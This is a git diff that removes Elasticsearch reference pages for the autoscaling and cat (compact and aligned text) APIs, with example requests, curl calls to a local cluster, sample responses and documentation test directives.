- -[source,console] --------------------------------------------------- -GET /_autoscaling/decision --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - decisions: [] -} --------------------------------------------------- diff --git a/docs/reference/autoscaling/apis/get-autoscaling-policy.asciidoc b/docs/reference/autoscaling/apis/get-autoscaling-policy.asciidoc deleted file mode 100644 index 35db9d3a7fe..00000000000 --- a/docs/reference/autoscaling/apis/get-autoscaling-policy.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-get-autoscaling-policy]] -=== Get autoscaling policy API -++++ -Get autoscaling policy -++++ - -Get autoscaling policy. - -[[autoscaling-get-autoscaling-policy-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -PUT /_autoscaling/policy/my_autoscaling_policy -{ - "policy": { - "deciders": { - "fixed": { - } - } - } -} --------------------------------------------------- -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/my_autoscaling_policy --------------------------------------------------- -// TEST -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_autoscaling/policy/ --------------------------------------------------- -// TEST[s//my_autoscaling_policy/] - -[[autoscaling-get-autoscaling-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have -`manage_autoscaling` cluster privileges. For more information, see -<>. - -[[autoscaling-get-autoscaling-policy-desc]] -==== {api-description-title} - -This API gets an autoscaling policy with the provided name. - -[[autoscaling-get-autoscaling-policy-examples]] -==== {api-examples-title} - -This example gets an autoscaling policy named `my_autosaling_policy`. - -[source,console] --------------------------------------------------- -GET /_autoscaling/policy/my_autoscaling_policy --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "policy": { - "deciders": - } -} --------------------------------------------------- -// TEST[s//$body.policy.deciders/] diff --git a/docs/reference/autoscaling/apis/put-autoscaling-policy.asciidoc b/docs/reference/autoscaling/apis/put-autoscaling-policy.asciidoc deleted file mode 100644 index 3c831ebbbab..00000000000 --- a/docs/reference/autoscaling/apis/put-autoscaling-policy.asciidoc +++ /dev/null @@ -1,87 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-put-autoscaling-policy]] -=== Put autoscaling policy API -++++ -Put autoscaling policy -++++ - -Put autoscaling policy. 
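For readers who drive this API from the command line rather than the
Kibana console, a curl equivalent of the request documented below might
look like the following sketch. It is illustrative only: it assumes a
cluster listening on `localhost:9200`, omits authentication options for
brevity, and reuses the `my_autoscaling_policy` name and empty `fixed`
decider from the examples on this page.

[source,sh]
--------------------------------------------------
# Create or update the policy. The Content-Type header is required
# because the request carries a JSON body.
% curl -X PUT "localhost:9200/_autoscaling/policy/my_autoscaling_policy" \
  -H 'Content-Type: application/json' \
  -d '{ "policy": { "deciders": { "fixed": {} } } }'
--------------------------------------------------
// NOTCONSOLE

A successful call returns the same `{"acknowledged": true}` body shown in
the example response below.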
- -[[autoscaling-put-autoscaling-policy-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -PUT /_autoscaling/policy/ -{ - "policy": { - "deciders": { - "fixed": { - } - } - } -} --------------------------------------------------- -// TEST[s//name/] - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/name --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[[autoscaling-put-autoscaling-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have -`manage_autoscaling` cluster privileges. For more information, see -<>. - -[[autoscaling-put-autoscaling-policy-desc]] -==== {api-description-title} - -This API puts an autoscaling policy with the provided name. - -[[autoscaling-put-autoscaling-policy-examples]] -==== {api-examples-title} - -This example puts an autoscaling policy named `my_autoscaling_policy` using the -always autoscaling decider. - -[source,console] --------------------------------------------------- -PUT /_autoscaling/policy/my_autoscaling_policy -{ - "policy": { - "deciders": { - "fixed": { - } - } - } -} --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/my_autoscaling_policy --------------------------------------------------- -// TEST[continued] - -////////////////////////// diff --git a/docs/reference/autoscaling/index.asciidoc b/docs/reference/autoscaling/index.asciidoc deleted file mode 100644 index f8f1f98c042..00000000000 --- a/docs/reference/autoscaling/index.asciidoc +++ /dev/null @@ -1,19 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[xpack-autoscaling]] -[chapter] -= Autoscaling - -experimental[] - -The autoscaling feature enables an operator to configure tiers of nodes that -self-monitor whether or not they need to scale based on an operator-defined -policy. Then, via the autoscaling API, an Elasticsearch cluster can report -whether or not it needs additional resources to meet the policy. For example, an -operator could define a policy that a warm tier should scale on available disk -space. Elasticsearch would monitor and forecast the available disk space in the -warm tier, and if the forecast is such that the cluster will soon not be able to -allocate existing and future shard copies due to disk space, then the -autoscaling API would report that the cluster needs to scale due to disk space. -It remains the responsibility of the operator to add the additional resources -that the cluster signals it requires. diff --git a/docs/reference/cat.asciidoc b/docs/reference/cat.asciidoc deleted file mode 100644 index 8676c7cf502..00000000000 --- a/docs/reference/cat.asciidoc +++ /dev/null @@ -1,273 +0,0 @@ -[[cat]] -== Compact and aligned text (CAT) APIs - -["float",id="intro"] -=== Introduction - -JSON is great... for computers. Even if it's pretty-printed, trying -to find relationships in the data is tedious. Human eyes, especially -when looking at a terminal, need compact and aligned text. The compact and -aligned text (CAT) APIs aim to meet this need. 
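As a quick illustration, compare the cat view of node information with
what the JSON APIs return. The request below asks for only a handful of
the columns documented later on this page; the values in the output are
made up and will differ on your cluster.

[source,sh]
--------------------------------------------------
# v=true adds the header row; h= selects named columns.
% curl 'localhost:9200/_cat/nodes?v=true&h=ip,heap.percent,node.role,master,name'
ip        heap.percent node.role master name
127.0.0.1           42 dilmrt    *      node-1
--------------------------------------------------
// NOTCONSOLE

The same data is available as JSON by adding `format=json` to the
request, as described in the response-format section below.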
- -[IMPORTANT] -==== -cat APIs are only intended for human consumption using the -{kibana-ref}/console-kibana.html[Kibana console] or command line. They are _not_ -intended for use by applications. For application consumption, we recommend -using a corresponding JSON API. -==== - -All the cat commands accept a query string parameter `help` to see all -the headers and info they provide, and the `/_cat` command alone lists all -the available commands. - -[discrete] -[[common-parameters]] -=== Common parameters - -[discrete] -[[verbose]] -==== Verbose - -Each of the commands accepts a query string parameter `v` to turn on -verbose output. For example: - -[source,console] --------------------------------------------------- -GET /_cat/master?v=true --------------------------------------------------- - -Might respond with: - -[source,txt] --------------------------------------------------- -id host ip node -u_n93zwxThWHi1PDBJAGAg 127.0.0.1 127.0.0.1 u_n93zw --------------------------------------------------- -// TESTRESPONSE[s/u_n93zw(xThWHi1PDBJAGAg)?/.+/ non_json] - -[discrete] -[[help]] -==== Help - -Each of the commands accepts a query string parameter `help` which will -output its available columns. For example: - -[source,console] --------------------------------------------------- -GET /_cat/master?help --------------------------------------------------- - -Might respond with: - -[source,txt] --------------------------------------------------- -id | | node id -host | h | host name -ip | | ip address -node | n | node name --------------------------------------------------- -// TESTRESPONSE[s/[|]/[|]/ non_json] - -NOTE: `help` is not supported if any optional url parameter is used. -For example `GET _cat/shards/my-index-000001?help` or `GET _cat/indices/my-index-*?help` -results in an error. Use `GET _cat/shards?help` or `GET _cat/indices?help` -instead. - -[discrete] -[[headers]] -==== Headers - -Each of the commands accepts a query string parameter `h` which forces -only those columns to appear. For example: - -[source,console] --------------------------------------------------- -GET /_cat/nodes?h=ip,port,heapPercent,name --------------------------------------------------- - -Responds with: - -[source,txt] --------------------------------------------------- -127.0.0.1 9300 27 sLBaIGK --------------------------------------------------- -// TESTRESPONSE[s/9300 27 sLBaIGK/\\d+ \\d+ .+/ non_json] - -You can also request multiple columns using simple wildcards like -`/_cat/thread_pool?h=ip,queue*` to get all headers (or aliases) starting -with `queue`. - -[discrete] -[[numeric-formats]] -==== Numeric formats - -Many commands provide a few types of numeric output, either a byte, size -or a time value. By default, these types are human-formatted, -for example, `3.5mb` instead of `3763212`. The human values are not -sortable numerically, so in order to operate on these values where -order is important, you can change it. - -Say you want to find the largest index in your cluster (storage used -by all the shards, not number of documents). The `/_cat/indices` API -is ideal. You only need to add three things to the API request: - -. The `bytes` query string parameter with a value of `b` to get byte-level resolution. -. The `s` (sort) parameter with a value of `store.size:desc` to sort the output -by shard storage in descending order. -. The `v` (verbose) parameter to include column headings in the response. 
- -[source,console] --------------------------------------------------- -GET /_cat/indices?bytes=b&s=store.size:desc&v=true --------------------------------------------------- -// TEST[setup:my_index_huge] -// TEST[s/^/PUT my-index-000002\n{"settings": {"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -health status index uuid pri rep docs.count docs.deleted store.size pri.store.size -yellow open my-index-000001 u8FNjxh8Rfy_awN11oDKYQ 1 1 1200 0 72171 72171 -green open my-index-000002 nYFWZEO7TUiOjLQXBaYJpA 1 0 0 0 230 230 --------------------------------------------------- -// TESTRESPONSE[s/72171|230/\\d+/] -// TESTRESPONSE[s/u8FNjxh8Rfy_awN11oDKYQ|nYFWZEO7TUiOjLQXBaYJpA/.+/ non_json] -// TESTRESPONSE[skip:"AwaitsFix https://github.com/elastic/elasticsearch/issues/51619"] - -If you want to change the <>, use `time` parameter. - -If you want to change the <>, use `size` parameter. - -If you want to change the <>, use `bytes` parameter. - -[discrete] -==== Response as text, json, smile, yaml or cbor - -[source,sh] --------------------------------------------------- -% curl 'localhost:9200/_cat/indices?format=json&pretty' -[ - { - "pri.store.size": "650b", - "health": "yellow", - "status": "open", - "index": "my-index-000001", - "pri": "5", - "rep": "1", - "docs.count": "0", - "docs.deleted": "0", - "store.size": "650b" - } -] --------------------------------------------------- -// NOTCONSOLE - -Currently supported formats (for the `?format=` parameter): -- text (default) -- json -- smile -- yaml -- cbor - -Alternatively you can set the "Accept" HTTP header to the appropriate media format. -All formats above are supported, the GET parameter takes precedence over the header. -For example: - -[source,sh] --------------------------------------------------- -% curl '192.168.56.10:9200/_cat/indices?pretty' -H "Accept: application/json" -[ - { - "pri.store.size": "650b", - "health": "yellow", - "status": "open", - "index": "my-index-000001", - "pri": "5", - "rep": "1", - "docs.count": "0", - "docs.deleted": "0", - "store.size": "650b" - } -] --------------------------------------------------- -// NOTCONSOLE - -[discrete] -[[sort]] -==== Sort - -Each of the commands accepts a query string parameter `s` which sorts the table by -the columns specified as the parameter value. Columns are specified either by name or by -alias, and are provided as a comma separated string. By default, sorting is done in -ascending fashion. Appending `:desc` to a column will invert the ordering for -that column. `:asc` is also accepted but exhibits the same behavior as the default sort order. - -For example, with a sort string `s=column1,column2:desc,column3`, the table will be -sorted in ascending order by column1, in descending order by column2, and in ascending -order by column3. 
- -[source,sh] --------------------------------------------------- -GET _cat/templates?v=true&s=order:desc,index_patterns --------------------------------------------------- -//CONSOLE - -returns: - -[source,txt] --------------------------------------------------- -name index_patterns order version -pizza_pepperoni [*pepperoni*] 2 -sushi_california_roll [*avocado*] 1 1 -pizza_hawaiian [*pineapples*] 1 --------------------------------------------------- - -include::cat/alias.asciidoc[] - -include::cat/allocation.asciidoc[] - -include::cat/anomaly-detectors.asciidoc[] - -include::cat/count.asciidoc[] - -include::cat/dataframeanalytics.asciidoc[] - -include::cat/datafeeds.asciidoc[] - -include::cat/fielddata.asciidoc[] - -include::cat/health.asciidoc[] - -include::cat/indices.asciidoc[] - -include::cat/master.asciidoc[] - -include::cat/nodeattrs.asciidoc[] - -include::cat/nodes.asciidoc[] - -include::cat/pending_tasks.asciidoc[] - -include::cat/plugins.asciidoc[] - -include::cat/recovery.asciidoc[] - -include::cat/repositories.asciidoc[] - -include::cat/segments.asciidoc[] - -include::cat/shards.asciidoc[] - -include::cat/snapshots.asciidoc[] - -include::cat/tasks.asciidoc[] - -include::cat/templates.asciidoc[] - -include::cat/thread_pool.asciidoc[] - -include::cat/trainedmodel.asciidoc[] - -include::cat/transforms.asciidoc[] diff --git a/docs/reference/cat/alias.asciidoc b/docs/reference/cat/alias.asciidoc deleted file mode 100644 index b9aaaa6eb38..00000000000 --- a/docs/reference/cat/alias.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[cat-alias]] -=== cat aliases API -++++ -cat aliases -++++ - -Returns information about currently configured aliases to indices, including -filter and routing information. - - -[[cat-alias-api-request]] -==== {api-request-title} - -`GET /_cat/aliases/` - -`GET /_cat/aliases` - -[[cat-alias-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`view_index_metadata` or `manage` <> -for any alias you retrieve. 
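If you manage roles yourself and want to grant just enough access for
this API, a minimal role definition might look like the following
sketch. It assumes the {es} {security-features} are enabled; the role
name `cat_aliases_reader` and the index pattern are placeholders for
your own aliases and indices.

[source,console]
--------------------------------------------------
PUT /_security/role/cat_aliases_reader
{
  "indices": [
    {
      "names": [ "my-index-*" ],
      "privileges": [ "view_index_metadata" ]
    }
  ]
}
--------------------------------------------------
// TEST[skip:illustrative sketch, role name and index pattern are placeholders]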
- -[[cat-alias-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias] - - -[[cat-alias-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - - -[[cat-alias-api-example]] -==== {api-examples-title} - -//// -Hidden setup for example: -[source,console] --------------------------------------------------- -PUT test1 -{ - "aliases": { - "alias1": {}, - "alias2": { - "filter": { - "match": { - "user.id": "kimchy" - } - } - }, - "alias3": { - "routing": "1" - }, - "alias4": { - "index_routing": "2", - "search_routing": "1,2" - } - } -} --------------------------------------------------- -//// - -[source,console] --------------------------------------------------- -GET /_cat/aliases?v=true --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -alias index filter routing.index routing.search is_write_index -alias1 test1 - - - - -alias2 test1 * - - - -alias3 test1 - 1 1 - -alias4 test1 - 2 1,2 - --------------------------------------------------- -// TESTRESPONSE[s/[*]/[*]/ non_json] - -This response shows that `alias2` has configured a filter, and specific routing -configurations in `alias3` and `alias4`. - -If you only want to get information about specific aliases, you can specify -the aliases in comma-delimited format as a URL parameter, e.g., -/_cat/aliases/alias1,alias2. diff --git a/docs/reference/cat/allocation.asciidoc b/docs/reference/cat/allocation.asciidoc deleted file mode 100644 index 8f9e9ac8c62..00000000000 --- a/docs/reference/cat/allocation.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[[cat-allocation]] -=== cat allocation API -++++ -cat allocation -++++ - - -Provides a snapshot of the number of shards allocated to each data node -and their disk space. - - -[[cat-allocation-api-request]] -==== {api-request-title} - -`GET /_cat/allocation/` - -`GET /_cat/allocation` - -[[cat-allocation-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. 
- -[[cat-allocation-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - -[[cat-allocation-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -[[cat-allocation-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/allocation?v=true --------------------------------------------------- -// TEST[s/^/PUT test\n{"settings": {"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -shards disk.indices disk.used disk.avail disk.total disk.percent host ip node - 1 260b 47.3gb 43.4gb 100.7gb 46 127.0.0.1 127.0.0.1 CSUXak2 --------------------------------------------------- -// TESTRESPONSE[s/\d+(\.\d+)?[tgmk]?b/\\d+(\\.\\d+)?[tgmk]?b/ s/46/\\d+/] -// TESTRESPONSE[s/CSUXak2/.+/ non_json] - -This response shows a single shard is allocated to the one node available. diff --git a/docs/reference/cat/anomaly-detectors.asciidoc b/docs/reference/cat/anomaly-detectors.asciidoc deleted file mode 100644 index 33c5016787c..00000000000 --- a/docs/reference/cat/anomaly-detectors.asciidoc +++ /dev/null @@ -1,283 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[cat-anomaly-detectors]] -=== cat anomaly detectors API -++++ -cat anomaly detectors -++++ - -Returns configuration and usage information about {anomaly-jobs}. - -[[cat-anomaly-detectors-request]] -==== {api-request-title} - -`GET /_cat/ml/anomaly_detectors/` + - -`GET /_cat/ml/anomaly_detectors` - -[[cat-anomaly-detectors-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[cat-anomaly-detectors-desc]] -==== {api-description-title} - -See {ml-docs}/ml-jobs.html[{anomaly-jobs-cap}]. - -NOTE: This API returns a maximum of 10,000 jobs. - -[[cat-anomaly-detectors-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[cat-anomaly-detectors-query-params]] -==== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ -If you do not specify which columns to include, the API returns the default -columns. If you explicitly specify one or more columns, it returns only the -specified columns. 
-+ -Valid columns are: - -`assignment_explanation`, `ae`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-anomaly-jobs] - -`buckets.count`, `bc`, `bucketsCount`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count-anomaly-jobs] - -`buckets.time.exp_avg`, `btea`, `bucketsTimeExpAvg`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-exponential-average] - -`buckets.time.exp_avg_hour`, `bteah`, `bucketsTimeExpAvgHour`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-exponential-average-hour] - -`buckets.time.max`, `btmax`, `bucketsTimeMax`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-maximum] - -`buckets.time.min`, `btmin`, `bucketsTimeMin`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-minimum] - -`buckets.time.total`, `btt`, `bucketsTimeTotal`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-total] - -`data.buckets`, `db`, `dataBuckets`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count] - -`data.earliest_record`, `der`, `dataEarliestRecord`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=earliest-record-timestamp] - -`data.empty_buckets`, `deb`, `dataEmptyBuckets`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=empty-bucket-count] - -`data.input_bytes`, `dib`, `dataInputBytes`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-bytes] - -`data.input_fields`, `dif`, `dataInputFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-field-count] - -`data.input_records`, `dir`, `dataInputRecords`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-record-count] - -`data.invalid_dates`, `did`, `dataInvalidDates`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=invalid-date-count] - -`data.last`, `dl`, `dataLast`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=last-data-time] - -`data.last_empty_bucket`, `dleb`, `dataLastEmptyBucket`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-empty-bucket-timestamp] - -`data.last_sparse_bucket`, `dlsb`, `dataLastSparseBucket`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-sparse-record-timestamp] - -`data.latest_record`, `dlr`, `dataLatestRecord`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-record-timestamp] - -`data.missing_fields`, `dmf`, `dataMissingFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=missing-field-count] - -`data.out_of_order_timestamps`, `doot`, `dataOutOfOrderTimestamps`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=out-of-order-timestamp-count] - -`data.processed_fields`, `dpf`, `dataProcessedFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=processed-field-count] - -`data.processed_records`, `dpr`, `dataProcessedRecords`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=processed-record-count] - -`data.sparse_buckets`, `dsb`, `dataSparseBuckets`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=sparse-bucket-count] - -`forecasts.memory.avg`, `fmavg`, `forecastsMemoryAvg`::: -The average memory usage in bytes for forecasts related to the {anomaly-job}. - -`forecasts.memory.max`, `fmmax`, `forecastsMemoryMax`::: -The maximum memory usage in bytes for forecasts related to the {anomaly-job}. - -`forecasts.memory.min`, `fmmin`, `forecastsMemoryMin`::: -The minimum memory usage in bytes for forecasts related to the {anomaly-job}. - -`forecasts.memory.total`, `fmt`, `forecastsMemoryTotal`::: -The total memory usage in bytes for forecasts related to the {anomaly-job}. 
- -`forecasts.records.avg`, `fravg`, `forecastsRecordsAvg`::: -The average number of `model_forecast` documents written for forecasts related -to the {anomaly-job}. - -`forecasts.records.max`, `frmax`, `forecastsRecordsMax`::: -The maximum number of `model_forecast` documents written for forecasts related -to the {anomaly-job}. - -`forecasts.records.min`, `frmin`, `forecastsRecordsMin`::: -The minimum number of `model_forecast` documents written for forecasts related -to the {anomaly-job}. - -`forecasts.records.total`, `frt`, `forecastsRecordsTotal`::: -The total number of `model_forecast` documents written for forecasts related to -the {anomaly-job}. - -`forecasts.time.avg`, `ftavg`, `forecastsTimeAvg`::: -The average runtime in milliseconds for forecasts related to the {anomaly-job}. - -`forecasts.time.max`, `ftmax`, `forecastsTimeMax`::: -The maximum runtime in milliseconds for forecasts related to the {anomaly-job}. - -`forecasts.time.min`, `ftmin`, `forecastsTimeMin`::: -The minimum runtime in milliseconds for forecasts related to the {anomaly-job}. - -`forecasts.time.total`, `ftt`, `forecastsTimeTotal`::: -The total runtime in milliseconds for forecasts related to the {anomaly-job}. - -`forecasts.total`, `ft`, `forecastsTotal`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=forecast-total] - -`id`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`model.bucket_allocation_failures`, `mbaf`, `modelBucketAllocationFailures`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-allocation-failures-count] - -`model.by_fields`, `mbf`, `modelByFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-by-field-count] - -`model.bytes`, `mb`, `modelBytes`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-bytes] - -`model.bytes_exceeded`, `mbe`, `modelBytesExceeded`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-bytes-exceeded] - -`model.categorization_status`, `mcs`, `modelCategorizationStatus`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-status] - -`model.categorized_doc_count`, `mcdc`, `modelCategorizedDocCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorized-doc-count] - -`model.dead_category_count`, `mdcc`, `modelDeadCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dead-category-count] - -`model.failed_category_count`, `mdcc`, `modelFailedCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=failed-category-count] - -`model.frequent_category_count`, `mfcc`, `modelFrequentCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=frequent-category-count] - -`model.log_time`, `mlt`, `modelLogTime`::: -The timestamp when the model stats were gathered, according to server time. 
- -`model.memory_limit`, `mml`, `modelMemoryLimit`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-limit-anomaly-jobs] - -`model.memory_status`, `mms`, `modelMemoryStatus`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-status] - -`model.over_fields`, `mof`, `modelOverFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-over-field-count] - -`model.partition_fields`, `mpf`, `modelPartitionFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-partition-field-count] - -`model.rare_category_count`, `mrcc`, `modelRareCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=rare-category-count] - -`model.timestamp`, `mt`, `modelTimestamp`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-timestamp] - -`model.total_category_count`, `mtcc`, `modelTotalCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-category-count] - -`node.address`, `na`, `nodeAddress`::: -The network address of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-jobs] - -`node.ephemeral_id`, `ne`, `nodeEphemeralId`::: -The ephemeral ID of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-jobs] - -`node.id`, `ni`, `nodeId`::: -The unique identifier of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-jobs] - -`node.name`, `nn`, `nodeName`::: -The node name. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-jobs] - -`opened_time`, `ot`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=open-time] - -`state`, `s`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=state-anomaly-job] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -[[cat-anomaly-detectors-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cat/ml/anomaly_detectors?h=id,s,dpr,mb&v=true --------------------------------------------------- -// TEST[skip:kibana sample data] - -[source,console-result] ----- -id s dpr mb -high_sum_total_sales closed 14022 1.5mb -low_request_rate closed 1216 40.5kb -response_code_rates closed 28146 132.7kb -url_scanning closed 28146 501.6kb ----- -// TESTRESPONSE[skip:kibana sample data] diff --git a/docs/reference/cat/count.asciidoc b/docs/reference/cat/count.asciidoc deleted file mode 100644 index 39f3ab1bdaf..00000000000 --- a/docs/reference/cat/count.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[[cat-count]] -=== cat count API -++++ -cat count -++++ - -Provides quick access to a document count for a data stream, an index, or an -entire cluster. - -NOTE: The document count only includes live documents, not deleted documents -which have not yet been removed by the merge process. - - -[[cat-count-api-request]] -==== {api-request-title} - -`GET /_cat/count/` - -`GET /_cat/count` - -[[cat-count-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for any data stream, index, or index -alias you retrieve. - -[[cat-count-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. 
-+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cat-count-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-count-api-example]] -==== {api-examples-title} - -[[cat-count-api-example-ind]] -===== Example with an individual data stream or index - -The following `count` API request retrieves the document count for the -`my-index-000001` data stream or index. - -[source,console] --------------------------------------------------- -GET /_cat/count/my-index-000001?v=true --------------------------------------------------- -// TEST[setup:my_index_big] - - -The API returns the following response: - -[source,txt] --------------------------------------------------- -epoch timestamp count -1475868259 15:24:20 120 --------------------------------------------------- -// TESTRESPONSE[s/1475868259 15:24:20/\\d+ \\d+:\\d+:\\d+/ non_json] - -[[cat-count-api-example-all]] -===== Example with all data streams and indices in a cluster - -The following `count` API request retrieves the document count for all data -streams and indices in the cluster. - -[source,console] --------------------------------------------------- -GET /_cat/count?v=true --------------------------------------------------- -// TEST[setup:my_index_big] -// TEST[s/^/POST test\/_doc\?refresh\n{"test": "test"}\n/] - -The API returns the following response: - -[source,txt] 